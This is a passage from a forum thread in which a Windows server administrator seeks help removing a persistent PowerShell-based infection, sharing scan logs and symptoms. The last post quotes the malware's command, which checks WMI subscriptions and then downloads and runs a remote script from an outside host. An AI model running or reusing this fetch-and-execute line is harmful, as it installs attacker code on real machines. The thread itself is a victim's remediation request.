Alvaro

Hi, thanks for your effort but the problem continues, malwarebytes continue giving the message "site blocked site due a potencial malicius to ip: xxx.xxx.xxx.xx" is very strange too that if I try to go to %temp% I go to c:\temp\1 but my temp file is at c:\temp if I try to delete all temp files there is always some in use but I can not delete the "1" folder.

I just run it and here is the file Fixlog.txt

here is addition.txt Addition.txt

The file you ask... thanks, this trojan is making me nuts. FRST.txt

HI thanks for the response but apparently the solution is not working, I have malwarebytes EndPoint Security running in a SBS 2011 Server, so when I try to install Malwarebytes 3.0 the installer stops because is not for my SO. in the second when I run awcleaner it detects that my DHCP Service is infected, (descripcion attached as a jpg image), and 3rd step is not possible the antivirus eliminate the download once is at downloads folder. When I start the malwarebytes scanner I choose to detectd PUP and all the checks to try to locate the infection but none is detected, I run Symantec EndPoint Security and same result nothing appears in detections. I think is a script running in the background under Powershell service but no clue how to detect and stop it.

Hi, I have to Windows servers (2008 and SBS2011) and both were infected with Y1.bat variant, I run some scripts and apparently I remove them from the system, actually I have Malwarebytes EndPoint installed and from time to time the anti-exploit shows a message blocking some IP address from access, but none people use this server as a workstation. Now apparently the malware comes again but with a differente variant and when I scan with Malwarebytes no infection appears, I download and Scan with the Anti-Rootkit and nothing appear. I see that the %temp% folders is redirected to a Temp\1 folder (same as the last time), not sure how to properly remove this thread. Any suggestion will be appreciated. Before I discover the following script that I properly remove: powershell -nop "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('SCM Event Filter')))) {IEX(New-Object Net.WebClient).DownloadString('http://stafftest.spdns.eu:8000/mate6.ps1')}" The following link explain how to remove it in the past: https://community.spiceworks.com/topic/2080003-malicious-powershell-script-causing-100-cpu-load-solved